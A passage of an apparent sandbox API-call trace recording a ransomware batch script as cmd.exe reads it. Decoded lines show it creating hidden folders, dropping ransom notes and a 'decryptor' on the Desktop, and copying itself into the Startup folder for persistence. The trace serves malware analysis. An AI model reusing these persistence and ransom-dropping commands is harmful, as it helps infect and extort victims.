lpDistanceToMoveHigh=0x0) returned 0x525 [0104.554] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.554] SetFilePointer (in: hFile=0x318, lDistanceToMove=1321, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0104.554] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":3\r\n 3\r\n") returned 4 [0104.554] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0104.554] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.554] GetFileType (hFile=0x318) returned 0x1 [0104.554] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0104.555] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.555] SetFilePointer (in: hFile=0x318, lDistanceToMove=1342, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0104.555] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRSRAMSOMWARE\r\n /e /d everyone\r\n") returned 21 [0104.555] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0104.555] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.555] GetFileType (hFile=0x318) returned 0x1 [0104.555] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0104.555] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.555] SetFilePointer (in: hFile=0x318, lDistanceToMove=1379, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0104.555] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRSRAMSOMWARE\r\n\n") returned 37 [0104.555] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0104.555] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.555] GetFileType (hFile=0x318) returned 0x1 [0104.555] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0104.555] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.555] SetFilePointer (in: hFile=0x318, lDistanceToMove=1395, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0104.555] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=16, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRS_TEMP\r\n+r C:\\FRSRAMSOMWARE\r\n") returned 16 [0104.555] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0104.555] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.555] GetFileType (hFile=0x318) returned 0x1 [0104.555] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0104.555] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.555] SetFilePointer (in: hFile=0x318, lDistanceToMove=1427, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0104.555] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRS_TEMP\r\nARE\r\n") returned 32 [0104.555] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0104.555] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.555] GetFileType (hFile=0x318) returned 0x1 [0104.555] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0104.555] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.556] SetFilePointer (in: hFile=0x318, lDistanceToMove=1462, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0104.556] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo.encrypt>C:\\FRS_TEMP\\temp.txt\r\n\r\n") returned 35 [0104.556] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0104.556] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.556] GetFileType (hFile=0x318) returned 0x1 [0104.556] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0104.556] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.556] SetFilePointer (in: hFile=0x318, lDistanceToMove=1542, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0104.556] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=80, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\Users\\%username%\\Desktop\\FRS_Decryptor.exe\r\npng\r\n") returned 80 [0104.556] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0104.556] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.556] GetFileType (hFile=0x318) returned 0x1 [0104.556] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0104.556] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.556] SetFilePointer (in: hFile=0x318, lDistanceToMove=1626, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0104.556] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.png\r\n\n") returned 84 [0104.556] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0104.556] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.556] GetFileType (hFile=0x318) returned 0x1 [0104.556] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0104.556] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.556] SetFilePointer (in: hFile=0x318, lDistanceToMove=1710, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0104.556] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.txt\r\n") returned 84 [0104.556] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0104.556] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.556] GetFileType (hFile=0x318) returned 0x1 [0104.556] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0104.556] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.556] SetFilePointer (in: hFile=0x318, lDistanceToMove=1806, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0104.556] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=96, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n\n") returned 96 [0104.557] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0104.557] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.557] GetFileType (hFile=0x318) returned 0x1 [0104.557] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0104.557] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.557] SetFilePointer (in: hFile=0x318, lDistanceToMove=1840, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0104.557] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=34, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 C:\\FRSRAMSOMWARE\\FRS.exe\r\nag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n") returned 34 [0104.557] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0104.557] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.557] GetFileType (hFile=0x318) returned 0x1 [0104.557] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0104.557] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.557] SetFilePointer (in: hFile=0x318, lDistanceToMove=1937, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0104.557] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=97, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 \"C:\\Users\\FIFCOM\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\FRS.exe\"\r\n") returned 97 [0104.557] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0104.557] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.557] GetFileType (hFile=0x318) returned 0x1 [0104.557] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0104.557] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.557] SetFilePointer (in: hFile=0x318, lDistanceToMove=2006, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0104.557] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=69, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\FRSRAMSOMWARE\\FRS_Decryptor.exe\r\n\\Programs\\Startup\\FRS.exe\"\r\n") returned 69 [0104.557] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0104.557] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.557] GetFileType (hFile=0x318) returned 0x1 [0104.557] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0104.557] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.557] SetFilePointer (in: hFile=0x318, lDistanceToMove=2079, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0104.557] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.png\r\ngrams\\Startup\\FRS.exe\"\r\n") returned 73 [0104.557] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0104.557] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.558] GetFileType (hFile=0x318) returned 0x1 [0104.558] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0104.558] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.558] SetFilePointer (in: hFile=0x318, lDistanceToMove=2152, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0104.558] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.txt\r\n") returned 73 [0104.558] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0104.558] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.558] GetFileType (hFile=0x318) returned 0x1 [0104.558] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0104.558] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.558] SetFilePointer (in: hFile=0x318, lDistanceToMove=2237, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0104.558] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=85, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\np\\FRS.exe\"\r\n") returned 85 [0104.558] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0104.558] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.558] GetFileType (hFile=0x318) returned 0x1 [0104.558] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0104.558] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x1b1, lpOverlapped=0x0) returned 1 [0104.558] SetFilePointer (in: hFile=0x318, lDistanceToMove=2280, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0104.558] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=43, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\Chinese_national_flag.png\r\n\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\n") returned 43 [0104.558] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0104.558] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.558] GetFileType (hFile=0x318) returned 0x1 [0104.558] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0104.558] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x186, lpOverlapped=0x0) returned 1 [0104.558] SetFilePointer (in: hFile=0x318, lDistanceToMove=2302, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0104.558] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\ne_national_flag.png\r\n") returned 22 [0104.558] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0104.558] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.558] GetFileType (hFile=0x318) returned 0x1 [0104.558] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0104.559] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x170, lpOverlapped=0x0) returned 1 [0104.559] SetFilePointer (in: hFile=0x318, lDistanceToMove=2339, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0104.559] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.txt\r\n.png\r\n") returned 37 [0104.559] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0104.559] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.559] GetFileType (hFile=0x318) returned 0x1 [0104.559] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0104.559] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x14b, lpOverlapped=0x0) returned 1 [0104.559] SetFilePointer (in: hFile=0x318, lDistanceToMove=2361, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0104.559] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.txt\r\n") returned 22 [0104.559] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0104.559] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.559] GetFileType (hFile=0x318) returned 0x1 [0104.559] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0104.559] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x135, lpOverlapped=0x0) returned 1 [0104.559] SetFilePointer (in: hFile=0x318, lDistanceToMove=2383, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0104.559] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="taskkill notepad.exe\r\n") returned 22 [0104.559] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0104.559] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.559] GetFileType (hFile=0x318) returned 0x1 [0104.559] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0104.559] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x11f, lpOverlapped=0x0) returned 1 [0104.559] SetFilePointer (in: hFile=0x318, lDistanceToMove=2420, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0104.559] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.png\r\n") returned 37 [0104.559] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0104.559] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.559] GetFileType (hFile=0x318) returned 0x1 [0104.559] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0104.559] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xfa, lpOverlapped=0x0) returned 1 [0104.559] SetFilePointer (in: hFile=0x318, lDistanceToMove=2442, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0104.560] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.png\r\n") returned 22 [0104.560] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0104.560] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.560] GetFileType (hFile=0x318) returned 0x1 [0104.560] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0104.560] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: 